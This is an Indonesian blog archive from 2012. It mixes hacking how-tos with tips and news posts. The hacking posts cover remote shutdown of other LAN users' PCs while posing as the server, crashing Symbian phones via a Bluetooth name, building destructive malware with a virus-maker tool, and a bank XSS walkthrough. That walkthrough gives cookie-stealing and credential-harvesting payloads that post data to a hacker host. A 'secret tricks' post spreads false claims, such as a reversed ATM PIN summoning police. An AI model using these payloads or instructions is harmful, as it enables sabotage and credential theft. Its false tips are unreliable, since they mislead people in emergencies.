Senin, 09 Juli 2012

CARA MEMATIKAN PC / KOMPUTER DALAM SATUJARINGAN ( LAN )

PERTAMA VIA CMD



Cara mematikan Komputer lain pada Jaringan LAN

Berikut adalah Cara mematikan Komputer lain pada Jaringan LAN semoga dapat berhasil, dan jangan di salah gunakan karena dapat berdampak negatif pada diri sendiri dan orang lain. hehehehe.... 

  1. Sebelum memulai hal ini, Pastikan terlebih dahulu Firewall harus dimatikan kalau tidak hal ini akan percuma.
  2. Pada komputer sobat, masuk ke Cmd (Start > Run > ketik "cmd").
  3. Akan muncul Kotak Cmd, lalu ketikkan "shutdown.exe -i -m" (tanpa tanda Kutip), lalu tekan Enter.
  4. Maka akan muncul Kotak Dialog "Remote Shutdown Dialog".
  5. Klik Add untuk memilih IP target atau bisa juga masuk ke Browse.
  6. Lalu pada kotak 'What do you want.....' pilih mau di apain Komputer target (Shutdown, Restart, Log Off).
  7. Ketik waktu atau Time pada 'Display warning....' ketika Komputer bereaksi.
  8. Lalu pada Kotak Option pilih Aja 'Other (Planned)' agar Si user mengira kalau itu tindakan dari Server.
  9. Pada kotak Comment, isi aja Komentar sebelum Komputer Beraksi.
  10. Setelah Semua selesai Klik Ok. Perhatikan IP yang kamu kerjai.

VIA SOFTWARE

download disini..
DISINI

cara mAke nYa relatif mudah kok sob
lu tinggal pilih list komputer client yg ada di warnet tu..
nah klo da lo bisa milih 3 mode :
*shutdown pc target
*stanby pc target
*restar pc target
dan kmu pun bisa mencantum kan message ke pc target.

stelah selesai,tkan OK...
dan hal hasil target pun di lumpuh kan...



PALING SIMPLE


shutdown -s -m \\nama komputer -t waktu -c "pesan"



READ MORE →

Minggu, 08 Juli 2012

VIRUS UNTUK HP SYMBIAN





Dengan sedikit trik, anda bisa merestart HP symbian teman anda tanpa harus melakukan kontak fisik ^_^ Sil;ahkan ikuti langkah-langkah mudah berikut.

0 [0XFFF00000] Langkah-Langkah

Bukalah Notepad, kemudian ketik ” (tanda kutip) kemudian tekan tombol [Tab] dan ketiklah Restart. Tekan tombol [Tab] lagi, lalu akhiri dengan ” (tanda kutip).
Contoh: “ Restart ”
Ingat yach, setelah tanda kutip yang harus anda tekan adalah tombol [Tab], bukan space.
Simpan file tersebut dengan nama Restart.txt atau terserah Anda. Kirim file tersebut ke ponsel anda melalui bluetooth atau media perantara lain.
Buka file tadi (Restart.txt) di ponsel anda, copy teks yang tadi anda ketik.
Buka setting Bluetooth anda, ubah namanya menjadi teks yang tadi anda copy. jangan panik jika namanya jadi kacau, itu tandanya anda berhasil :P
Datangi teman anda, katakan hal-hal menarik yang bisa membuat dia terkagum-kagum. Misalnya:
“Bro, gue bisa bikin HP loe restart tanpa harus gue sentuh. Coba sekarang loe pake bluetooth loe.”
Saat teman anda mengaktifkan bluetooth nya, HP Sysmbiannya akan otomatis restart :D Orang-orang di sekeliling anda yang sedang memakai bluetooth juga akan ikut-ikutan Restart saat perangkatnya mendeteksi perangkat Anda :D

0 [0XFFFF0000] How it can BE??

Mudah saja, Symbian akan mendeteksi keberadaan bluetooth yang aktif, namun tidak bisa menampilkan device bluetoothnya karena dia tidak pernah mengenal karakter Tab. Hal ini akan mengakibatkan ERROR sehingga dia akan melakukan restart system secara otomatis.

froom : http://www.spyrozone.net
READ MORE →

Sabtu, 07 Juli 2012

SITUS PENTERJEMAH BAHASA ALAY



INI DIA SITUS PENTERJEMAH BAHASA ALAY / PEMBUAT BAHASA ALAY

BTW http://alay.tk/

MUMET GAN...
READ MORE →

404 realita


Pict Kiri (Pique & Shakira) = orang-orang menyukainya,tapi tak 1 pun orang yang tau kalo dia mendukung israel (Yahudi,zionis)

Pict Kanan (Balotelli) = orang-orang menertawakan dia dan tak 1 pun yang tau kalo dia mendonasikan 50% gajinya untuk anak-anak afrika
READ MORE →

Rabu, 04 Juli 2012

SOFTWARE UNTUK MEMBUAT VIRUS ( Terabit Virus Maker 3.2 )

   
Bagi orang yang jahil membuat virus adalah menyenangkan.anda ingin membuat virus tapi tidak mengerti bahasa pemograman. membuat virus itu sangat mudah.tidak perlu mengerti bahasa pemograman, karena kita bisa membuatnya dengan virusmaker seperti Vb vimaker 32 atau terabit virus maker bahkan dengan notepad kita bisa membuat virus .vbs.ini diungkinkan karena di internet banyak source script kode virus berekstensi .vbs

Tidak heran banyak varian virus baru yang muncul dari virus versi yang lama.Gak heran ada kabar bahwa ada kongkalikon antara pemuat virus dengan produsen anti virus.kali ini saya akan membahas salah satu dari banyak nya virus maker di dunia.Kali ini saya mengunakan Terabit virus maker 3.1 asli buatan iran.software ini menjadikan pembutan virus semudah bermain game.karena pengunaannya yang gampang dengan efek virus terhadap komputer yang banyak pilihan tinggal disesuaikan denagan keinginan si pembuat berikut..

Di lihat dari tampilanya seorang newbie dalam dunia komputer pun bisa membuat virus.yang di beri tanda silang adalah pengaturan efek virus yang akan di buat.bisa di kostumisasi sendiri oleh pembuat virusmendisable task manager,regedit, CMD,bahkan memformat smua Hard drives yang ada di komputer kita.di lihat dari pilihanya lengkap sehingga jika virus ini di klik maka komputer anda akan hancur lebur.Langsung saja kita ke tahap pembuatan.
Langkah pertama untuk membuat virus
1.Buka program TVM 3.1
2.Beri tanda ceklist pada efek mana yang anda inginkan bila anda kejam klik semuanya aja(hehehehe).terserah apayang anda inginkan
3. Beri tanda ceklist pada kotak fake error message jika anda ingin memunculkan pesan anda setelah virus itu di aktifkan
4. Tinggal pilih nama file virus anda,icon virus anda dan nama file setelah di instal
5. Beri tanda ceklist pada tulisan Run with windows
6. Terakhir tinggal klik create maka virus pun jadi

Tujuan dari tutorial ini bukan untuk memotivasi anda supaya membuat program yang sifatnya merusak tapi penulis ingin membuka mata anda bahwa anda harus lebih waspada terhadap virus varian baru yang selalu muncul karena mudahnya membuat virus dengan virus maker dan script virus vbs yang gampang di dapatkan di internet.Tidak main asal klik file/folder yang anda tidak ketahui(misalnya icon nya berupa folder tetapi berekstensi EXE)dan yang terakhir selau update anti virus anda.kalau bisa gabungkan antara antivirus lokal denagan luar negeri.sekain artikel dari saya semoga berguna.



READ MORE →

JENIS JENIS VIRUS DAN ANTI VIRUS





Ada banyak cara untuk mengklasifikasikan virus, dan setiap metode tersebut menghasilkan nama kategori yang berbeda-beda. Worm, macrovirus, trojan dan backdoor adalah beberapa contoh virus yang banyak dikenal. Banyak dari virus tersebut tersebar di Internet, melalui email, situs web berbahaya, atau berbagai cara lain yang ditujukan untuk menginfeksi komputer yang tidak terlindungi. Virus lain tersebar melalui media yang bisa dipindahkan, seperti stik memori/USB dan eksternal hard drives yang memungkinkan pengguna untuk menulis dan membaca informasi. Virus dapat menghancurkan, merusak, atau menginfeksi informasi dalam komputer anda, termasuk data yang berada dalam drive eksternal. Virus juga dapat mengkontrol komputer anda dan menggunakannya untuk menyerang komputer lain. Untungnya banyak perangkat anti-virus yang dapat anda gunakan untuk melindungi komputer anda serta mereka yang sering bertukar informasi digital dengan anda.
Perangkat Lunak (Software) Anti-virus

Ada sebuah program freeware anti-virus hebat untuk Windows disebut Avast,program ini mudah digunakan, di-update (perbarui) secara rutin, dan diakui oleh para ahli anti-virus. Program ini mengharuskan anda mendaftar setiap 14 bulan sekali, proses pendaftaran, up dates dan program ini diberikan secara gratis.

Clam Win adalah sebuah alternatif FOSS untuk Avast dan berbagai program anti-virus ternama yang banyak dijual di pasaran. Walaupun terbatas dalam beberapa fitur utama yang penting dalam program anti-virus, Clam Win memiliki kelebihan, yaitu dapat dijalankan melalui stik memori/USB untuk memindai komputer yang diprotect dimana anda tidak dapat meg-install software kedalamnya. Program ini sangat berguna saat anda harus menggunakan komputer umum atau warnet untuk pekerjaan yang penting.
Tips penggunaan software anti-virus secara efektif

* Jangan menjalankan dua program anti-virus pada saat yang bersamaan karena dapat memperlambat kerja komputer anda atau dapat juga menyebabkan crash. Hapuslah program anti-virus yang ada sebelum anda menginstal program anti-virus yang baru
* Pastikan program anti-virus anda memungkinkan untuk menerima update. Banyak dari anti-virus komersil atau yang sudah diinstal dalam komputer baru harus didaftarkan (dan harus membayar) terlebih dahulu untuk item-item tertentu atau antivirus tersebut akan berhenti menerima up date. Semua software yang direkomendasikan disini dapat di-update secara gratis.
* Pastikan software anti-virus anda di-update secara teratur. Virus baru dibuat dan disebarkan setiap hari dan komputer anda bisa menjadi rentan jika anti-virus anda tidak terus menerus di-update. Avast akan secara otomatis meng-update saat komputer anda terhubung dengan Internet.
* Upayakan agar fitur Virus Detection pada Anti Virus anda selalu dalam posisi ‘always on’ (selalu menyala). Setiap software memiliki nama yang berbeda untuk fitur tersebut, tetapi kebanyakan memiliki fitur yang serupa. Ada yang menyebutnya ‘Realtime Protection’ , ‘Resident Protection’, atau sejenisnya. Perhatikan Section 3.2.1 pada Panduan Avast untuk mempelajari lebih lanjut tentang fitur ‘Resident Scanner’ pada perangkat tersebut.
* Scan (pindai) semua berkas yang ada dalam komputer anda secara rutin. Anda tidak harus melakukannya setiap hari (terutama jika Anti Virus anda memiliki fitur ‘always on’ seperti dijelaskan di atas), tetapi anda tetap harus melakukannya secara berkala. Seberapa seringnya tergantung pada keadaan masing-masing. Apakah baru-baru ini anda menghubungkan komputer anda ke jaringan yang tidak dikenal? Dengan siapa saja anda sudah berbagi stik memori/USB? Apakah anda sering menerima lampiran aneh dalam email anda? Apakah komputer yang ada di rumah atau kantor anda mengalami gangguan virus? Untuk informasi lebih lanjut mengenai cara men-scanning file, lihat Panduan Avast.

Mencegah infeksi virus

* Berhati-hatilah saat membuka attachment (lampiran email). Sebaiknya hindari membuka attachment dari sumber tidak dikenal. Jika anda harus membukanya, pertama anda harus menyimpan lampiran tersebut ke dalam folder di komputer anda, lalu bukalah aplikasi yang sesuai (seperti Microsoft Word atau Adobe Acrobat). Jika anda menggunakan menu ‘File’ dalam program untuk membuka lampiran secara manual dan tidak meng-klik dua kali lampiran tersebut atau membiarkan email anda membukanya secara otomatis, kemungkinan anda untuk terkena virus lebih kecil.
* Pertimbangkan resikonya sebelum memasukkan media seperti CD, DVD, dan stik memori/USB ke komputer anda. Anda harus memastikan anti-virus anda sudah ter-update dan virus scan berjalan. Ada baiknya juga untuk mematikan fitur ‘AutoPlay’ pada komputer anda, fitur ini sering digunakan virus untuk menginfeksi komputer. Dalam Windows XP, ini dapat dilakukan dengan cara masuk ke My Computer, klik-kanan pada penggerak CD atau DVD, pilih Properties dan klik pada tab AutoPlay. Pilih Take no action atau Prompt me each time to choose an action untuk setiap tipe berkas, lalu klik OK.
* Anda juga dapat mencegah infeksi virus dengan beralih ke software open source yang dapat diperoleh secara gratis, biasanya lebih aman dan jarang diincar oleh para pembuat virus..
READ MORE →

Ubah Asap Rokok Jadi Oksigen, 2 Siswa SMA Semarang Raih Emas di Bangkok


Semarang Dua siswa SMAN 3 Semarang menorehkan prestasi di ajang International Exhibition for Young Inventors (IEYI) 2012 di Bangkok yang diadakan tanggal 28 Juni - 1 Juli 2012 lalu. Mereka adalah Hermawan Maulana dan Zihrama Afdi membawa pulang medali emas ke Indonesia.

Inovasi dua pemuda tersebut diberi nama T-Box Application to Reduce the Danger Impact of CO dan CO2 in Smoking Room. Fungsi dari penemuan tersebut adalah untuk memfilter karbondioksida atau CO2 yang dihasilkan oleh asap rokok di smoking room untuk diambil oksigennya. Nantinya oksigen tersebut akan dialirkan kembali ke dalam smoking room.

"Hal itu bertujuan agar para perokok betah merokok di dalam smoking room sehingga tidak mengganggu orang lain," terang Afdi di SMAN 3 Semarang, Jalan Pemuda, Rabu (4/7/2012).

Ide dibuatnya alat tersebut adalah ketika Afdi dan Hermawan melihat jumlah perokok yang semakin banyak. Selain itu perokok biasanya tidak betah berada di smoking room yang sudah disiapkan karena asap yang ada di ruangan. Dari pengamatan itulah dua pemuda tersebut belajar dengan tekun untuk membuat alat yang bisa mengurai CO2.

"Kami belajar untuk mengurangi dampak negatif rokok dan membuat alat pengurang residu dari rokok," terang Afdi.

"Karena kami belum mampu untuk mengurangi jumlah perokok, maka kami membuat alat tersebut," timpal Hermawan.

Alat buatan Afdi dan Hermawan yang sebelumnya diberi nama Carbofil Aplication tersebut memiliki sistem kerja yaitu asap rokok yang ada di smoking room akan masuk ke dalam mesin yang terdiri dari power suply buatan sendiri dan T-box. Di dalam alat tersebut asap akan difilter oleh PCB yang dialiri listrik sehingga CO2 dan O2 terpisah. Setelah itu O2 atau oksigen akan dikembalikan ke dalam smoking room.

"Saat lempengan PCB bertemu ada percikan listrik yang disebut plasma, itulah yg kami gunakan untuk mengurangi CO2," pungkas Afdi.

"Nanti hasil filternya adalah oksigen dan karbon padat. Karbon tersebut masih bisa dimanfaatkan lagi nantinya," imbuh guru pembimbing mereka, Agus Priyanto.

Hermawan dan Afdi sempat minder ketika alat tersebut diikutkan lomba dengan sistem pameran. Alat yang masih berupa prototipe tersebut disejajarkan dengan penemuan-penemuan hasil pemikiran siswa-siswa dari Jepang dan negara lainnya.

"Sempat minder, soalnya kita dikasih stand di pojok dan sebelah stand Jepang," kata Hermawan.

Mereka berhasil menyingkirkan pesaingnya yang berasal dari delapan negara yaitu Hongkong, Malaysia, Jepang, Filipina, Thailand, Vietnam, Singapura, dan Taiwan.

Afdi adalah anak pertama dari dua bersaudara pasangan Abdul Hafid dan Ninik Budi, ia lahir di Grobogan, 17 Februari 1995. Sedangkan Hermawan adalah anak kedua dari dua bersaudara pasangan Suwaji dan Seti Jawati Noegraeni yang lahir di Pekanbaru tanggal 24 Mei 1996.

Sementara itu Kepsek SMAN 3 Semarang, Hari Waluyo mengaku dengan adanya prestasi yang ditorehkan Afdi dan Hermawan, guru dan siswa di SMAN 3 menjadi termotivasi untuk menghasilkan prestasi-prestasi internasional lainnya.

"Saya bangga terhadap anak-anak ini (Afdi dan Hermawan). Jadi memotivasi anak-anak kelas X dan para guru yang akan lebih sistematis dalam mengajar," tutur Kepsek.

Prestasi Afdi dan Hermawan ternyata tidak hanya berhenti sampai di sini. Mereka ternyata sudah menyiapkan proyek lain yaitu Nitrosoplasma. Proyek plasma tersebut untuk mengikatkan nitrogen ke tanaman.

"September besok mungkin diajukan untuk lomba," ujar Afdi.

Selain Hermawan dan Afdi, medali emas juga diperoleh Linus Nara Pradhana dari SMP Petra Surabaya dengan inovasinya yaitu Water Coated Helmet. Tidak hanya medali emas, dua medali perunggu dan dua special award juga disabet siswa-siswi dari Indonesia.

Dua medali perunggu dibawa pulang oleh Muhammad Luqman dan Fishal Fuad Rahman dari SMAN 2 Yogyakarta dengan inovasinya yaitu Edges Shoes. Lalu dengan inovasi bernama Braille Glass, siswa kelas enam SD Muhammadiyah Manyar, Gresik, Nadya Almass Lutfiahardha Arief juga memperoleh medali perunggu.

Sementara itu dua special award diperoleh siswa SMKN 1 Tengaran yaitu Dini Esfandiari dan Shofi Delaila Herdi dengan penemuan Mini Multi Commander serta Nur Chabibur Rohim, Muhammad Asrori, dan Risang Yogardi dengan inovasi Jaritmatika Game.

"Harapan kami, penemuan kami bisa dipatenkan," tutup Afdi.



Sumber
READ MORE →

TRICK TRIK RAHASIA YANG JARANG DIKETAHUI





1.. Nomor Darurat untuk telepon genggam adalah 112. Jika anda sedang di daerah yg tidak menerima sinyal HP & perlu memanggil pertolongan , silahkan tekan 112 , dan HP akan mencari otomatis network apapun yang ada untuk menyambungkan nomor darurat anda.Dan yg menarik, nomor 112 dapat ditekan biarpun keypad dalam kondisi lock.

2.. Kunci mobil anda ketinggalan di dalam mobil ? anda memakai Kunci remote ? kalau kunci anda ketinggalan dalam mobil & remote cadangannya ada dirumah , anda segera telpon orang rumah dengan HP , lalu dekatkan HP anda kurang lebih 30CM dari mobil & minta orang rumah untuk menekan tombol pembuka pada remote cadangan yang ada dirumah.pada waktu menekan tombol pembuka remote , minta orang rumah mendekatkan remotenya ke telepon yang dipakainya.

3.. Battery cadangan darurat khusus NOKIA , kalau batterai anda sudah sangat minim padahal anda sedang menunggu telpon penting atau sedang butuh menelfon dalam kondisi darurat , tapi karna telpon anda NOKIA , silahkan tekan *3370# , maka telpon anda otomatis restart dan baterai akan menambah 50% . 

4.. Tips untuk menge - check keabsahan mobil/motor anda ( JAKARTA AREA ONLY ) . CONTOH KETIK : metro b8435yd(no plat mobil anda) Kirim ke 1717 , nanti akan ada balasan dari kepolisian mengenai data2 kendaraan anda , tips ini juga berguna mengetahui data2 mobil bekas yg hendak anda akan beli . 

5.. jika anda terancam jiwa karna dirampok/ ditodong seseorang untuk mengeluarkan uang dari atm , maka anda bisa minta pertolongan diam2 dengan memberikan nomor pin SECARA TERBALIK , misal nomor asli pin anda 1254 , nah input 4521 di ATM maka mesin akan mengeluarkan uang anda juga tanda bahaya ke kantor polisi tanpa diketahui pencuri tsb



Sumber : http://www.kaskus.co.id/showthread.php?t=15285022
READ MORE →

JACKY NOYA SI RAJA EMAS DAN NAGA LANGIT DARI PAPUA



Sosok Jacky Noya Raja Emas dari Ambon ---Nama Jacky Noya akhir-akhir ini mencuat kepermukaan. Jacky Noya yang memiliki nama lengkap Jacky William B Noya ini di gadang-gadang akan menjadi orang nomor satu di Maluku pada 2013-2018 mendatang. Jacky Noya adalah putra asli Maluku yang lahir di Ambon pada 17 April 1967. Ia adalah pengusaha sukses asal Maluku di tanah rantau Papua.

Kisah Naga dan Emas
Pemberitaan tentang Jacky Noya di media infotainmen televisi berkisar tentang kisah suksesnya sebagai pengusaha tambang emas. Kisah sukses ini juga dikaitkan dengan penampakan seekor naga di langit yang sempat diabadikan Jacky Noya melalui kamera hapenya. Sejak saat itu, kehidupan Jacky Noya berubah drastis menjadi sosok kaya raya setelah menemukan tambang emas di Papua. Wajar jika sekarang, aksesoris yang dipakai Jacky Noya di taksir hingga miliaran rupiah, yang terdiri dari Jam tangan seharga 5 miliar, cincin, dan kalung emas seberat total 10 kg. Sinkron dengan julukannya sebagai raja emas dari Ambon.

Jacky Noya Sosok Dermawan
Sebagai seorang yang pernah merasakan kehidupan tanah rantau, tentunya sosok Jacky Noya paham betul dengan kehidupan serba kekurangan. Maka adalah hal yang wajar ketika ia berada di puncak kesuksesan ia akan semakin dermawan. Tidak tanggung-tanggung, setidaknya 37 miliar sudah siap digelontorkan Jacky Noya untuk kesejahteraan rakyat Maluku. Mulai dari bantuan rumah peribadatan, olah raga, hingga bantuan menjelang Ramadhan dan natal 2012. Semua dilakukan Jacky Noya sebagai bentuk syukur terhadap apa yang telah diperolehnya selama ini di tanah rantau.

Melihat kesuksesan seorang Jacky Noya, tentunya ini bisa menjadi pelajaran bagi orang sukses lainnya untuk memberikan sedikit hartanya demi kemajuan daerahnya. Bukan sebaliknya, mengeksploitasi dan menghisap orang yang tidak mampu setelah menjadi pemimpin mereka. Dan selanjutnya, kita tunggu sepak terjang Sosok Jacky Noya Raja Emas dari Ambon di Pemilukada Maluku 2013 mendatang.

NB:

Jacky Noya punya blog kampanye menuju Maluku 1, yang beralamatkan di jackywilliamnoya.blogspot.com. Sebagian info di artikel ini bersumber dari blog tersebut.
sumber :  http://www.iskaruji.com/2012/07/jacky-noya.html
READ MORE →

Selasa, 03 Juli 2012

GAMBAR DAN LOGO HACKER

berikut adalah gambar dan logo hacker :
























































READ MORE →

CARA NGEHACK WEBSITE DENGAN XSS

Jim Ley menemukan adanya permasalahan XSS pada situs Google dan ia memutuskan untuk melaporkannya kepada Google. Lebih dari dua tahun lamanya, ternyata laporan dari Jim Ley tidak digubris sama sekali sehingga akhirnya pada bulan oktober 2004 ia memutuskan untuk mempublikasikan kepada publik.

Kelemahan XSS yang terjadi pada situs Google ini memungkinkan dilakukannyaVirtual Defacement dimana halaman google akan diganti dengan halaman palsu yang dibuat oleh hacker.


Jim Ley membuat halaman input informasi kartu kredit yang seakan-akan dilakukan oleh google, padahal bukan. Pada URL google, Jim Ley menambahkan kode :
L:javascript:javascript:document.appendChild(document.createElement('script')).src='http://jibbering.com/test.js

Kode ini akan membuat script yang berada pada situs lain yaitu jibbering.com/test.js akan dijalankan seakan-akan berasal dari google (http://jibbering.com/2004/10/google.html)

Tidak Hanya Google

Google bukanlah satu-satunya korban dari serangan XSS.

SunTrust Bank, Mastercard, National Westminster dan Wordplay adalah 'klien besar' yang terkekna serangan XSS dan Greenhalgh mempublikasikan tehnik yang digunakan dalam menginjeksi javascript terhadap situs bank yang seharusnya nomor satu dalam hal pengamanan. Kasus-kasus XSS masih terus berlangsung bahkan sampai detik ini dan OWASP ( Open Web Application Security Project ), sebuah organisasi yang mengusulkan diri pada keamanan aplikasi, mengkategorikan XSS sebagai permasalahan utama aplikasi web saat ini.

Situs Bank Lokal Menjadi Korban

Kejadian yang hampir serupa dengan yang dialami oleh Greenhalgh juga saya rasakan. Ceritanya pada saya hendak menggunakan transaksi internet banking (ya, saya adalah pengguna setia layanan ini) dan salah memasukan password. Aplikasi Internet banking menampilkan sebuah pesan/warning tentang kesalahan yang saya lakukan " User ID harus Alpha Numerik/User ID must be Alpha Numeric ".

Yang menarik perhatian saya adalah pesan yang ditampilkan ini, ternyata juga muncul di bagian URL! " https://ibank.*****.com/authentication.do?value(actions)=logout&value(strError)=User ID harus Alpha Numerik/User ID must be Alpha Numeric ".

Suatu teknik yang biasa digunakan oleh programmer untuk mengirimkan parameter kepada sebuah fungsi dan sebuah teknik yang biasanya bermasalah dalam hal kelemahan injeksi script atau kelemahan XSS!

Kejadian ini terjadi lebih dari 2 tahun yang lalu atau tepatnya pada bulan april 2007 dan telah saya laporkan kepada pihak bank melalui SMS ( 081811**** ) yang di jawab akan dilakukan investigasi.

Sampai tulisan ini saya buat kembali, ternyata permasalahan ini sama sekali tidak diperbaiki, mungkin karena dianggap bukan sebagai suatu kelemahan dan bukan sesuatu yang berbahaya.

Benarkah demikian? Saya akan memperlihatkan kepada Anda apa yang bisa saya lakukan akibat dari kesalahan semacam ini dan silahkan Anda nilai sendiri.

Teknik Mencari Kelemahan XSS

Untuk melihat kemungkinan serangan XSS, saya melihat source code yang dihasilkan pada saat warning aplikasi ini ditampilkan. Pada baris 230, terlihat kalimat yang ditampilkan berada didalam sebuah variable yaitu " err " dan variable ini berada didalam blok kode <script>.

Untuk membuktikan adanya kelemahan XSS, saya mencoba memasukkan java script standard yang akan menampilkan cookie dengan memodifikasi URL-nya menjadi :
https://ibank.*****.com/authentication.do?value(actions)=logout&value(strError)=';alert(document.cookie);</script>

Dengan merubah URL ini, kini bila dilihat melalui source code halaman yang menampilkan pesan akan berubah menjadi :
<script>
var err='';allert(document.cookie);</script>
alert(err);
iBankForm.action='login.jsp';
iBankForm.submit();
</script>


Harapan saya sebenarnya aksi ini akan gagal karena mengharapkan adanya proteksi tambahan seperti pemblokiran terhadap karakter khusus atau penghapusan kata<script> yang umum dilakukan, ternyata dugaan saya keliru. Tidak ada proteksi sama sekali terhadap potensi XSS ini dan aksi ini berhasil dengan baik yang dibuktikan dengan menampilkan cookie yang berjalan dengan lancar.

Percobaan ini membuktikan bahwa pencurian cookie memungkinkan untuk terjadi sehingga memungkinkan adanya serangan session hijacking atau pengambil alihan suatu koneksi oleh hacker. Ada beberapa hal yang cukup menarik untuk diperhatikan dalam kasus ini.

Pertama, penggunaan https atau sebuah koneksi yang secure ternyata tidak berguna dalam kasus ini. Kedua, penggunaan sertifikat yang biasanya dikatakan sebagai jaminan keamanan ternyata juga tidak berguna bahkan bisa dikatakan menjebak. Saya akan menunjukan betapa tidak bergunanya sertifikat ini pada percobaan sederhana berikutnya.

Virtual Defacement

Selanjutnya, saya mencoba membuktikan serangan yang lebih serius yaitu dengan melakukan virtual defacement atau perubahan halaman secara virtual. Dikatakan sebagai virtual karena saya tidak benar-benar merubah tampilan halaman web bank tersebut namun hanya merubahnya secara virtual melalui injeksi perintah.

Kenapa berbahaya? Karena saya akan menambahkan sebuah input box baru yang seakan-akan disediakan oleh situs bank dan yang lebih berbahaya adalah ketika pengguna mengisi text box yang telah disediakan dan menekan tombol submit. Hasil inputan ini akan dikirimkan ke alamat hacker atau alamat yang telah saya tentukan, bukan ke alamat bank, padahal sertifikat situs tersebut masih asli lho !

Untuk menambahkan form text box dan tombol submit, saya tidak perlu menggunakan java script, cukup dengan tag HTML. URL yang telah dimodifikasi, akan terlihat sebagai berikut :


https://ibank.*****.com/authentication.do?value(actions)=logout&value(strError)=';</script><form method="post" action="http//www.hacker.com/simpan.aspx"><p>User ID<input type="text" name"T1"><input type="Submit" value="Submit" name="B1></p></form><!--

Modifikasi URL akan membuat source code halaman login situs bank berubah menjadi :

<script> var err='';</script><form method="post" action="http//www.*******.com/a.aspx"><p>User ID<input type="text" name"T1"><input type="Submit" value="Submit" name="B1></p></form><!--' alert(err);iBankForm.action='login.jsp'; iBankForm.submit(); </script> </body> </html><script>

Setelah memasukkan URL yang telah dimodifikasi, terlihat sebuah text box berada di bawah halaman utama bank ! Apa artinya ini ? Virtual Defacement telah berhasil dilakukan! Teknik mendeface tanpa merusak dan merubah file yang ada didalam web server!

Kemungkinan Aksi Lanjutan

Saya sudah menunjukkan kepada Anda bagaimana mengambil cookie dengan java script dan bagaimana melakukan virtual defacement dengan menambahkan sebuah text box yang baru. Teknik Virtual Defacement ini cukup menarik karena bisa dilakukan walaupun situs menggunakan HTTPS dan ada yang lebih menarik lagi.

Biasanya, Anda selalu diwanti oleh pihak agar mengecek keabsahan sertifikat ( dalam contoh ini adalah cybertrust ) yang digunakan untuk memastikan keaslian situs yang digunakan. Pada kasus ini sertifikat yang Anda lihat adalah asli dan sah namun ketika Anda memasukkan data kedalam text box dan mengklik tombol submit, informasi Anda akan dikirimkan kepada hacker! Kaget ? Teknik ini bisa dikombinasikan dengan teknik penipuan/social engineering seperti dengan mengirimkan email kepada korban dan menginformasikan kepadanya tentang undian berhadiah atau memintanya mengganti password melalui form palsu yang telah disediakan oleh Hacker. Saya yakin, banyak sekali yang ahli dalam hal Social Engineering dan tidak perlu lagi saya berikan contoh-contoh lainnya. Kini, apakah menurut Anda serangan XSS berbahaya atau tidak? Siapa yang harus bertanggung jawab seandainya terjadi korban dalam kasus semacam ini?

Serangan XSS yang saya tunjukkan pada artikel ini, masih sangat sederhana dan tidak melakukan deface pada halaman secara total seperti yang pernah ditunjukkan olehJim Ley dan Greenhalgh namun bukan berarti tidak mungkin untuk dilakukan.

Dengan menginjeksi javascript, bahkan bisa dibuat fungsi keylogger, scanning network, pencurian password lokal dan lain sebagainya. Jadi, akibat dari permasalahan XSS ini jelas sangat serius bila di eksploitasi oleh orang yang tepat.

Sekedar info :



" XSS merupakan singkatan dari Cross Site Scripting memang tampak sedikit aneh. Singkatan dari Cross Site Scripting seharusnya CSS namun singkatan ini ternyata memberikan masalah bagi pengguna CSS telah digunakan oleh Cascading Style Sheets, suatu bahasa yang digunakan untuk mengatur tampilan halaman suatu dokumen web. CSS sendiri sangat populer karena menawarkan fleksibilitas pengaturan tampilan dan akibatnya tentu saja, akan membingungkan pengguna apabila terdapat dua singkatan yang sama untuk menandakan dua hal yang berbeda sama sekali. Akhirnya, Cross Site Scripting harus mengalah dan menggunakan singkatan XSS "

sumber : disini
READ MORE →